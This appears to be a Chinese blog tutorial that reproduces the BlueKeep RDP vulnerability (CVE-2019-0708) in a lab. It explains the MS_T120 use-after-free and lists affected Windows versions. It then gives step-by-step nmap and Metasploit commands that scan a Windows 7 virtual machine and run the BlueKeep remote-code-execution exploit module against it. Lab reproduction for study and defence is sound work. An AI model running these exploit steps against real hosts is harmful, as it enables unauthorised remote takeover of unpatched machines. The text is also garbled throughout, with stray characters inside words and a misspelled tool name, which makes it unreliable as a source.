漏洞介紹
2019年5月14日微軟官方發(fā)布安全補(bǔ)丁,修復(fù)了 Windows 遠(yuǎn)程桌面服務(wù)的遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞影響了某些舊版本的 Windows 系統(tǒng)。此漏洞是預(yù)身份驗(yàn)證,無(wú)需用戶交互,這就意味著這個(gè)漏洞可以通過(guò)網(wǎng)絡(luò)蠕蟲的方式被利用,與2017年 WannaCry 勒索病毒的傳播方式類似。
漏洞原理
存在漏洞的遠(yuǎn)程桌面服務(wù)器,在接收到特殊數(shù)據(jù)包時(shí)會(huì)釋放一個(gè)內(nèi)部信道 MS_T120 的控制結(jié)構(gòu)體,但并未將指向該結(jié)構(gòu)體的指針刪除,而且在遠(yuǎn)程桌面連接結(jié)束之后還會(huì)調(diào)用 MS_T120 結(jié)構(gòu)體內(nèi)的一個(gè)函數(shù)指針,若攻擊者可通過(guò)遠(yuǎn)程發(fā)送數(shù)據(jù)重新占據(jù)被釋放的 MS_T120,并為結(jié)構(gòu)體內(nèi)的函數(shù)指針賦恰當(dāng)?shù)闹?,即可?shí)現(xiàn)遠(yuǎn)程命令執(zhí)行。
影響版本
目前已知受影響的 Windows 版本包括但不限于:
Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows Server 2003
Windows XP
Windows 8 和 windows10 以及之后的版本不受此漏洞影響
漏洞復(fù)現(xiàn)
復(fù)現(xiàn)環(huán)境
windows11(本機(jī))192.168.2.51
windows7(虛擬機(jī))192.168.2.44 橋接
kali2022.1(虛擬機(jī))192.168.2.248 橋接
復(fù)現(xiàn)過(guò)程
首先windows7開啟了3389端口,關(guān)閉了防火墻
登錄kali2022.1,用自帶的namp進(jìn)行端口掃描windows7,發(fā)現(xiàn)3389端口開啟
nmap 192.168.2.44
打開msf
msfconsole
查找cve-2019-0708,存在POC和EXP
search cve-2019-0708
先選擇POC判斷漏洞是否存在,確定漏洞存在
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.2.44
run
退回
back
使用EXP進(jìn)行攻擊,拿到權(quán)限文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-442570.html
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.2.44
show options
show targets
set target 5
run
文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-442570.html
到了這里,關(guān)于【漏洞復(fù)現(xiàn)】CVE-2019-0708(BlueKeep)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!